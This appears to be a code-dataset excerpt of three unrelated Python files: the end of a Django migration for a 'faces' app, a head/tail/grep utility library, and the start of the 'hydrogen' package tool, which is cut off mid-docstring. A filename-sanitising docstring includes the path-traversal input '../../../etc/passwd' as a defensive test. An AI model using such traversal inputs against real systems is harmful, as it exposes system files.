'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'zip_import': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'})
},
'album.imagecollectionimage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'ImageCollectionImage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'file': ('mezzanine.core.fields.FileField', [], {'max_length': '200'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'faces.district': {
'Meta': {'object_name': 'District'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'district_description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'faces.face': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Face'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'district_id': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['faces.District']", 'null': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pinned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'zip_import': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'})
},
'faces.faceimage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'FaceImage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'face': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': u"orm['faces.Face']"}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection_image': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'face_image'", 'to': "orm['album.ImageCollectionImage']"}),
'image_file': ('mezzanine.core.fields.FileField', [], {'max_length': '200', 'null': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pinned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['faces']
|
RuralIndia/pari
|
pari/faces/migrations/0006_auto__add_field_face_district_id.py
|
Python
|
bsd-3-clause
| 11,120
| 0.009083
|
import sys
import os
import re
def human_size_to_byte(number):
"""
Convert number of these units to bytes, ignore case:
b : 512
kB : 1000
K : 1024
mB : 1000*1000
m : 1024*1024
MB : 1000*1000
M : 1024*1024
GB : 1000*1000*1000
G : 1024*1024*1024
TB : 1000*1000*1000*1000
T : 1024*1024*1024*1024
PB : 1000*1000*1000*1000*1000
P : 1024*1024*1024*1024*1024
EB : 1000*1000*1000*1000*1000*1000
E : 1024*1024*1024*1024*1024*1024
ZB : 1000*1000*1000*1000*1000*1000*1000
Z : 1024*1024*1024*1024*1024*1024*1024
YB : 1000*1000*1000*1000*1000*1000*1000*1000
Y : 1024*1024*1024*1024*1024*1024*1024*1024
number is of one of these forms:
123, 123b, 123M, 1G
"""
mapping = {
'b' : 512 ,
'kb' : 1000,
'k' : 1024,
'mb' : 1000**2,
'm' : 1024**2,
'gb' : 1000**3,
'g' : 1024**3,
'tb' : 1000**4,
't' : 1024**4,
'pb' : 1000**5,
'p' : 1024**5,
'eb' : 1000**6,
'e' : 1024**6,
'zb' : 1000**7,
'z' : 1024**7,
'yb' : 1000**8,
'y' : 1024**8,
}
unit = re.sub('^[0-9]+', '', number)
if unit:
unit = unit.lower()
assert unit in mapping.keys(), "wrong unit %s " % unit
amount = int(number[:-len(unit)])
return mapping[unit] * amount
else:
return int(number)
def correct_offset(file):
"""Due to Python cache issue, the real file offset of the
underlying file descriptor may differ, this function can correct
it.
"""
cur = file.seek(0, 1)
file.seek(0, 2)
file.seek(cur)
def open_file(file):
if file == '-':
return os.fdopen(sys.stdin.fileno(), 'rb')
else:
return open(file, 'rb')
class Locator:
"""Search from the end of the file backward, locate the starting
offset of the specified amount, measured by line, or by byte.
"""
def __init__(self, ifile, mode, amount, bs=8192):
"""mode can be 'lines' or 'bytes'"""
assert ifile.seekable(), "input file is not seekable"
self.orig_pos = ifile.seek(0, 1)
self.ifile = ifile
self.mode = mode
self.amount = amount
self.bs = bs
def find_line(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of lines.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
count = chunk.count(b'\n')
if count <= amount:
amount -= count
return False, 0, amount
else: # found
pos = -1
for i in range(count - amount):
pos = chunk.index(b'\n', pos+1)
pos += 1
diff = len(chunk) - pos
pos = ifile.seek(-diff, 1)
return True, pos, 0
def find_byte(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of bytes.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
length = len(chunk)
if length < amount:
amount -= length
return False, 0, amount
else: # found
pos = ifile.seek(-amount, 1)
return True, pos, 0
def find(self, ifile, offset, size, amount):
"""Read 'size' bytes starting from offset to find.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
try:
pos = ifile.seek(offset)
except OSError:
assert False, "unkown file seeking failure"
chunk = ifile.read(size)
if self.mode == 'lines':
return self.find_line(ifile, chunk, amount)
else:
return self.find_byte(ifile, chunk, amount)
def run(self):
"""Find the offset of the last 'amount' lines"""
ifile = self.ifile
amount = self.amount
orig_pos = self.orig_pos
end = ifile.seek(0, 2) # jump to the end
# nothing to process, return the original position
total = end - orig_pos
if total <= amount:
correct_offset(ifile)
return orig_pos
bs = self.bs
# process the last block
remaining = total % bs
offset = end - remaining
stat, pos, amount = self.find(ifile, offset, remaining, amount)
while not stat and offset != orig_pos:
offset -= bs
stat, pos, amount = self.find(ifile, offset, bs, amount)
ifile.seek(self.orig_pos)
correct_offset(ifile)
return pos
class Buffer:
def __init__(self, amount):
self.min = amount
self.total = 0
self.data = []
def push(self, pair):
self.data.append(pair)
self.total += pair[0]
def pop(self):
pair = self.data.pop(0)
self.total -= pair[0]
return pair
def cut(self):
"""Pop as many pairs off the head of the self.data as
self.is_ready() is True, return a combined result.
"""
count = 0
data = b''
while self.is_ready():
x, y = self.pop()
count += x
data += y
return count, data
def is_satisfied(self):
"""The minimum amount is satisfied"""
return self.total >= self.min
def is_ready(self):
"""The buffer is ready to pop"""
return self.total - self.data[0][0] >= self.min
class HeadWorkerSL:
"""Seekable, line mode"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def is_last(self, count):
return count >= self.amount
def action(self, data, count):
self.ofile.write(data)
self.amount -= count
def handle_last(self, data):
pos = -1
for i in range(self.amount):
pos = data.index(b'\n', pos+1)
pos += 1
self.ofile.write(data[:pos])
over_read = len(data) - pos
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
def run(self):
while self.amount:
data = self.read()
if not data:
break
count = self.transform(data)
if self.is_last(count):
self.handle_last(data)
break
else:
self.action(data, count)
class HeadWorkerSB(HeadWorkerSL):
"""Seekable, byte mode"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[:self.amount])
over_read = len(data) - self.amount
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
class HeadWorkerTL(HeadWorkerSL):
"""Terminal, line mode"""
def read(self):
return self.ifile.readline()
def action(self, data, count):
self.ofile.write(data)
self.amount -= 1
self.ofile.flush()
def handle_last(self, data):
self.ofile.write(data)
self.ofile.flush()
class HeadWorkerTB(HeadWorkerSB):
"""Terminal, byte mode"""
def read(self):
return self.ifile.readline()
class HeadWorkerULIT(HeadWorkerSL):
"""Unseekable, line mode ignore tail"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def fill(self):
"""Fill up the buffer with content from self.ifile"""
amount = self.amount
buffer = Buffer(amount)
while True:
data = self.read()
if not data:
break
count = self.transform(data)
buffer.push((count, data))
if buffer.is_satisfied():
break
return buffer
def step(self, buffer):
"""Read and process the self.ifile step by step,
return False if nothing left in self.ifile.
"""
data = self.read()
if not data:
return False
count = self.transform(data)
buffer.push((count, data))
if buffer.is_ready():
x, data = buffer.cut()
self.proc(data)
return True
def proc(self, data):
self.ofile.write(data)
self.ofile.flush()
def handle_last(self, buffer):
while True:
x, data = buffer.pop()
if buffer.is_satisfied():
self.proc(data)
else:
diff = buffer.min - buffer.total
lines = data.splitlines(keepends=True)
self.ofile.writelines(lines[:-diff])
break
self.ofile.flush()
def run(self):
buffer = self.fill()
if buffer.is_satisfied():
while self.step(buffer):
pass
self.handle_last(buffer)
class HeadWorkerTLIT(HeadWorkerULIT):
"""Terminal, line mode ignore tail"""
def read(self):
return self.ifile.readline()
class HeadWorkerUBIT(HeadWorkerULIT):
"""Unseekable, byte mode ignore tail"""
def transform(self, data):
return len(data)
def handle_last(self, buffer):
while True:
x, data = buffer.pop()
if buffer.is_satisfied():
self.ofile.write(data)
else:
diff = buffer.min - buffer.total
self.ofile.write(data[:-diff])
break
self.ofile.flush()
class HeadWorkerTBIT(HeadWorkerUBIT):
"""Terminal, byte mode ignore tail"""
def read(self):
return self.ifile.readline()
class Mixin:
def copy_to_end(self):
while True:
chunk = self.read()
if not chunk:
break
self.ofile.write(chunk)
class TailWorkerSLIH(HeadWorkerSL, Mixin):
"""Seekable, line mode, ignore head"""
def __init__(self, ifile, ofile, amount, bs=None):
super(TailWorkerSLIH, self).__init__(ifile, ofile, amount, bs)
if amount > 0:
self.amount -= 1
def action(self, data, count):
self.amount -= count
def handle_last(self, data):
pos = -1
for i in range(self.amount):
pos = data.index(b'\n', pos+1)
pos += 1
self.ofile.write(data[pos:])
self.copy_to_end()
class TailWorkerSBIH(TailWorkerSLIH):
"""Seekable, byte mode, ignore head"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[self.amount:])
self.copy_to_end()
class TailWorkerSB(TailWorkerSLIH):
def __init__(self, ifile, ofile, bs=None):
self.ifile = ifile
self.ofile = ofile
self.bs = bs or 8192
def run(self):
self.copy_to_end()
class TailWorkerULIH(HeadWorkerULIT, Mixin):
"""Unseekable, line mode ignore head"""
def proc(self, data):
"""Just ignore the data"""
def handle_last(self, buffer):
while True:
x, data = buffer.pop()
if not buffer.is_satisfied():
diff = buffer.min - buffer.total
self.split_and_proc(data, diff)
for x, data in buffer.data:
self.ofile.write(data)
break
def split_and_proc(self, data, diff):
lines = data.splitlines(keepends=True)
self.ofile.writelines(lines[-diff:])
class TailWorkerUBIH(TailWorkerULIH):
"""Unseekable, byte mode ignore head"""
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return len(data)
def split_and_proc(self, data, diff):
self.ofile.write(data[-diff:])
class TailWorkerTLIH(TailWorkerULIH):
"""Terminal, line mode ignore head"""
def read(self):
return self.ifile.readline()
class TailWorkerTBIH(TailWorkerTLIH):
"""Terminal, byte mode ignore head"""
def transform(self, data):
return len(data)
def split_and_proc(self, data, diff):
self.ofile.write(data[-diff:])
class TailWorkerTL(TailWorkerSLIH):
"""Terminal, line mode, ignore head"""
def read(self):
return self.ifile.readline()
def handle_last(self, data):
self.copy_to_end()
class TailWorkerTB(TailWorkerTL):
"""Terminal, byte mode, ignore head"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[self.amount:])
self.copy_to_end()
class GrepNameDetermined(Exception): pass
class GrepStatusDetermined(Exception): pass
class GrepWorker:
# VT100 color code
c_fname = b'\x1b[35m' # magenta
c_sep = b'\x1b[36m' # cyan
c_lnum = b'\x1b[32m' # green
c_match = b'\x1b[31m\x1b[1m' # bold red
c_off = b'\x1b[0m' # turn off color
sep_line = b'--\n'
c_sep_line = c_sep + b'--' + c_off + b'\n'
def __init__(self, pattern, options, ifile, ofile, bs=None):
self.pattern = pattern
self.options = options
self.ifile = ifile
self.ofile = ofile
self.bs = bs or 8192
self.nr = 0 # number of records
self.fname = self.make_fname(ifile.name)
self.status = False
# Invert the sense of matching
if ('invert' in options and 'file_match' not in options
and 'count' not in options):
self.on_match, self.on_not_match = self.on_not_match, self.on_match
# set on_match method for -q option
if 'quiet' in options:
self.on_match = self.quiet_on_match
# set reader for tty input file
if ifile.isatty():
self.read = self.read_tty
self.write = self.write_tty
# setup color output
color = options['color']
if color == 'always' or self.ofile.isatty() and color == 'auto':
self.sep_line = self.c_sep_line
self.make_fname_str = self.make_color_fname_str
self.make_lnum_str = self.make_color_lnum_str
self.make_matcher = self.make_color_matcher
self.matcher = self.make_matcher(options)
def insert_line_number(self, lines, num, sep=b':'):
"""Insert line number to the head of each line"""
num = str(num).encode()
num_str = self.make_lnum_str(num, sep)
return (b'%s%s' % (num_str, line) for line in lines)
def insert_file_name(self, lines, fname, sep=b':'):
"""Insert file name to the head of each line"""
fname_str = self.make_fname_str(fname, sep)
return (b'%s%s' % (fname_str, line) for line in lines)
def make_lnum_str(self, num, sep):
return num + sep
def make_fname_str(self, fname, sep):
return fname + sep
def make_color_lnum_str(self, num, sep):
return self.c_lnum + num + self.c_sep + sep + self.c_off
def make_color_fname_str(self, fname, sep):
return self.c_fname + fname + self.c_sep + sep + self.c_off
def quiet_on_match(self, *args, **kargs):
raise GrepStatusDetermined
def read(self):
"""Return an enumerate object with line number"""
lines = self.ifile.readlines(self.bs)
if not lines:
return None
count = len(lines)
res = enumerate(lines, self.nr + 1)
self.nr += count
return res
def read_tty(self):
"""Read the terminal, line by line"""
line = self.ifile.readline()
if not line:
return None
self.nr += 1
return [(self.nr, line)]
def make_normal_matcher(self, options):
# handle -w option, match word boundary
pat = self.pattern
if 'word_regexp' in self.options:
pat = r'\b%s\b' % pat
# handle -i option, ignore case
flags = 0
if 'ignore_case' in self.options:
flags |= re.IGNORECASE
pat = re.compile(pat.encode(), flags)
return pat
def make_matcher(self, options):
pat = self.make_normal_matcher(options)
class C:
def findall(self, line):
return pat.findall(line), line
return C()
def make_color_matcher(self, options):
pat = self.make_normal_matcher(options)
c_match = self.c_match
c_off = self.c_off
class C:
def findall(self, line):
matches = pat.findall(line)
if matches:
matches = [c_match + x + c_off for x in matches]
line = re.sub(pat, self.apply_color, line)
return matches, line
def apply_color(self, m):
return c_match + m.group() + c_off
return C()
def make_fname(self, name):
"""Make a file name for output"""
if name == 0:
name = '(standard input)'.encode()
else:
name = str(name).encode()
return name
def format_output(self, lines, lnum, options, sep=b':'):
"""Format lines for output"""
# handle -n option, show line number
if 'line_number' in options:
lines = self.insert_line_number(lines, lnum, sep)
# insert file name if necessary
if options['with_filename']:
lines = self.insert_file_name(lines, self.fname, sep)
return lines
def write(self, lines):
self.ofile.writelines(lines)
def write_tty(self, lines):
"""Write to terminal, flush after every write"""
self.ofile.writelines(lines)
self.ofile.flush()
def on_match(self, matches, line, lnum):
self.status = True
# handle -o option, show only the matched part
if 'only_matching' in self.options:
lines = (x + b'\n' for x in matches)
else:
lines = [line]
lines = self.format_output(lines, lnum, self.options)
self.write(lines)
def on_not_match(self, *args, **kargs):
return None
def run(self):
while True:
lines_data = self.read()
if not lines_data:
break
for n, line in lines_data:
matches, line = self.matcher.findall(line)
if matches:
self.on_match(matches, line, n)
else:
self.on_not_match(matches, line, n)
return self.status
class GrepWorkerAgg(GrepWorker):
def __init__(self, *args, **kargs):
super(GrepWorkerAgg, self).__init__(*args, **kargs)
self.match_count = 0
def format_output(self, lines, options):
"""Format lines for output"""
# insert file name if necessary
if options['with_filename']:
lines = self.insert_file_name(lines, self.fname)
return lines
def on_match(self, matches, line, lnum):
self.status = True
self.match_count += 1
def run(self):
status = super(GrepWorkerAgg, self).run()
lines = [str(self.match_count).encode() + b'\n']
lines = self.format_output(lines, self.options)
self.write(lines)
return status
class GrepWorkerFileName(GrepWorker):
def on_match(self, matches, line, lnum):
raise GrepNameDetermined
def run(self):
try:
super(GrepWorkerFileName, self).run()
status = False
except GrepNameDetermined:
self.write([self.fname + b'\n'])
status = True
return status
class GrepWorkerContext(GrepWorker):
def __init__(self, *args, **kargs):
super(GrepWorkerContext, self).__init__(*args, **kargs)
self.before = self.options.get('before', 0)
self.after = self.options.get('after', 0)
self.b_buf = []
self.a_counter = 0
self.last_written_lnum = 0
def write_separator(self, lnum):
last_lnum = self.last_written_lnum
first_lnum = self.b_buf[0][0] if self.b_buf else lnum
if last_lnum and first_lnum - last_lnum > 1:
self.write([self.sep_line])
def on_match(self, matches, line, lnum):
# the 'before' buffer may contain more lines than needed,
# truncate it before writing the separator in order not
# to interfere the line number calculation.
if self.before:
self.b_buf = self.b_buf[-self.before:]
else:
self.b_buf.clear()
self.write_separator(lnum)
self.write_b_buffer()
super(GrepWorkerContext, self).on_match(matches, line, lnum)
self.last_written_lnum = lnum
self.reset_a_counter()
def on_not_match(self, matches, line, lnum):
if self.a_counter:
if 'only_matching' not in self.options:
lines = self.format_output([line], lnum, self.options, b'-')
self.write(lines)
self.last_written_lnum = lnum
self.a_counter -= 1
else:
self.b_buf.append((lnum, line))
def reset_a_counter(self):
self.a_counter = self.after
def write_b_buffer(self):
"""Write out the 'before' buffer"""
if not self.b_buf:
return
# write only when -o option is not presented,
if 'only_matching' not in self.options:
for lnum, line in self.b_buf:
lines = self.format_output([line], lnum, self.options, b'-')
self.write(lines)
self.last_written_lnum = self.b_buf[-1][0]
self.b_buf.clear()
def run(self):
bs = self.before
while True:
self.b_buf = self.b_buf[-bs:]
lines_data = self.read()
if not lines_data:
break
for n, line in lines_data:
matches, line = self.matcher.findall(line)
if matches:
self.on_match(matches, line, n)
else:
self.on_not_match(matches, line, n)
return self.status
def recursive_walk(worker, names, pattern, options):
"""Process all regular files, descend into directories. When
the -q option is provided, the first match will trigger an
exception named GrepStatusDetermined."""
def processor(names, pattern, options, worker):
status_list = []
for name in names:
if os.path.isfile(name):
status = worker(name, pattern, options)
status_list.append(status)
elif os.path.isdir(name):
try:
sub_names = os.listdir(name)
except Exception as e:
print(str(e), file=sys.stderr)
status_list.append(False)
else:
sub_names = [os.path.join(name, x) for x in sub_names]
names.extend(sub_names)
return status_list
return walk(worker, names, pattern, options, processor)
def walk(worker, names, pattern, options, processor=None):
"""Each file shall be a regular file. When the -q option is
provided, the first match will trigger an exception named
GrepStatusDetermined."""
if not processor:
def processor(names, pattern, options, worker):
status_list = []
for name in names:
status = worker(name, pattern, options)
status_list.append(status)
return status_list
try:
status_list = processor(names, pattern, options, worker)
except GrepStatusDetermined:
status_list = [True]
if 'quiet' in options:
return any(status_list)
else:
return all(status_list)
|
iesugrace/pycmd
|
lib.py
|
Python
|
gpl-3.0
| 24,434
| 0.000941
|
# -*- coding: utf-8 -*-
"""
hydrogen
~~~~~~~~
Hydrogen is an extremely lightweight workflow enhancement tool for Python
web applications, providing bower/npm-like functionality for both pip and
bower packages.
:author: David Gidwani <david.gidwani@gmail.com>
:license: BSD, see LICENSE for details
"""
import atexit
from collections import defaultdict
from functools import update_wrapper
import json
import os
import re
import shutil
import sys
import tempfile
import yaml
import zipfile
import click
import envoy
from pathlib import Path, PurePath
from pathspec import GitIgnorePattern, PathSpec
from pip._vendor import pkg_resources
import requests
import rfc6266
import semver
__version__ = "0.0.1-alpha"
prog_name = "hydrogen"
app_dir = click.get_app_dir(prog_name)
github_api_uri = "https://api.github.com"
debug = True
# borrowed from werkzeug._compat
PY2 = sys.version_info[0] == 2
if PY2:
from urlparse import urlparse
text_type = unicode # noqa: Undefined in py3
else:
from urllib.parse import urlparse
text_type = str
class InvalidRequirementSpecError(Exception):
pass
class InvalidPackageError(Exception):
pass
class PackageNotFoundError(Exception):
pass
class VersionNotFoundError(Exception):
pass
def get_installed_pypackages():
return {p.project_name.lower(): p for p in pkg_resources.working_set}
def success(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "green")
click.secho(message, **kwargs)
def warning(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"warning: {}".format(message), **kwargs)
def error(message, level="error", exit_code=1, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"error: {}".format(message), **kwargs)
sys.exit(exit_code)
def fatal(message, **kwargs):
error(message, level="fatal", **kwargs)
def secure_filename(filename):
r"""Borrowed from :mod:`werkzeug.utils`, under the BSD 3-clause license.
Pass it a filename and it will return a secure version of it. This
filename can then safely be stored on a regular file system and passed
to :func:`os.path.join`. The filename returned is an ASCII only string
for maximum portability.
On windows systems the function also makes sure that the file is not
named after one of the special device files.
>>> secure_filename("My cool movie.mov")
'My_cool_movie.mov'
>>> secure_filename("../../../etc/passwd")
'etc_passwd'
>>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
'i_contain_cool_umlauts.txt'
The function might return an empty filename. It's your responsibility
to ensure that the filename is unique and that you generate random
filename if the function returned an empty one.
:param filename: the filename to secure
"""
_filename_ascii_strip_re = re.compile(r'[^A-Za-z0-9_.-]')
_windows_device_files = ('CON', 'AUX', 'COM1', 'COM2', 'COM3', 'COM4',
'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')
if isinstance(filename, text_type):
from unicodedata import normalize
filename = normalize('NFKD', filename).encode('ascii', 'ignore')
if not PY2:
filename = filename.decode('ascii')
for sep in os.path.sep, os.path.altsep:
if sep:
filename = filename.replace(sep, ' ')
filename = str(_filename_ascii_strip_re.sub('', '_'.join(
filename.split()))).strip('._')
# on nt a couple of special files are present in each folder. We
# have to ensure that the target file is not such a filename. In
# this case we prepend an underline
if os.name == 'nt' and filename and \
filename.split('.')[0].upper() in _windows_device_files:
filename = '_' + filename
return filename
def get(url, session=None, silent=not debug, **kwargs):
"""Retrieve a given URL and log response.
:param session: a :class:`requests.Session` object.
:param silent: if **True**, response status and URL will not be printed.
"""
session = session or requests
kwargs["verify"] = kwargs.get("verify", True)
r = session.get(url, **kwargs)
if not silent:
status_code = click.style(
str(r.status_code),
fg="green" if r.status_code in (200, 304) else "red")
click.echo(status_code + " " + url)
if r.status_code == 404:
raise PackageNotFoundError
return r
def download_file(url, dest=None, chunk_size=1024, replace="ask",
label="Downloading {dest_basename} ({size:.2f}MB)",
expected_extension=None):
"""Download a file from a given URL and display progress.
:param dest: If the destination exists and is a directory, the filename
will be guessed from the Content-Disposition header. If the destination
is an existing file, the user will either be prompted to overwrite, or
the file will be replaced (depending on the value of **replace**). If
the destination does not exist, it will be used as the filename.
:param int chunk_size: bytes read in at a time.
:param replace: If `False`, an existing destination file will not be
overwritten.
:param label: a string which is formatted and displayed as the progress bar
label. Variables provided include *dest_basename*, *dest*, and *size*.
:param expected_extension: if set, the filename will be sanitized to ensure
it has the given extension. The extension should not start with a dot
(`.`).
"""
dest = Path(dest or url.split("/")[-1])
response = get(url, stream=True)
if (dest.exists()
and dest.is_dir()
and "Content-Disposition" in response.headers):
content_disposition = rfc6266.parse_requests_response(response)
if expected_extension is not None:
filename = content_disposition.filename_sanitized(
expected_extension)
filename = secure_filename(filename)
dest = dest / filename
if dest.exists() and not dest.is_dir():
if (replace is False
or replace == "ask"
and not click.confirm("Replace {}?".format(dest))):
return str(dest)
size = int(response.headers.get("content-length", 0))
label = label.format(dest=dest, dest_basename=dest.name,
size=size/1024.0/1024)
with click.open_file(str(dest), "wb") as f:
content_iter = response.iter_content(chunk_size=chunk_size)
with click.progressbar(content_iter, length=size/1024,
label=label) as bar:
for chunk in bar:
if chunk:
f.write(chunk)
f.flush()
return str(dest)
def get_dir_from_zipfile(zip_file, fallback=None):
"""Return the name of the root folder in a zip file.
:param zip_file: a :class:`zipfile.ZipFile` instance.
:param fallback: if `None`, the name of the zip file is used. This is
returned if the zip file contains more than one top-level directory,
or none at all.
"""
fallback = fallback or zip_file.filename
directories = [name for name in zip_file.namelist() if name.endswith("/")
and len(PurePath(name).parts) == 1]
return fallback if len(directories) > 1 else directories[0]
def mkdtemp(suffix="", prefix=__name__ + "_", dir=None, cleanup=True,
on_cleanup_error=None):
"""Create a temporary directory and register a handler to cleanup on exit.
:param suffix: suffix of the temporary directory, defaults to empty.
:param prefix: prefix of the temporary directory, defaults to `__name__`
and an underscore.
:param dir: if provided, the directory will be created in `dir` rather than
the system default temp directory.
:param cleanup: if `True`, an atexit handler will be registered to remove
the temp directory on exit.
:param on_cleanup_error: a callback which is called if the atexit handler
encounters an exception. It is passed three parameters: *function*,
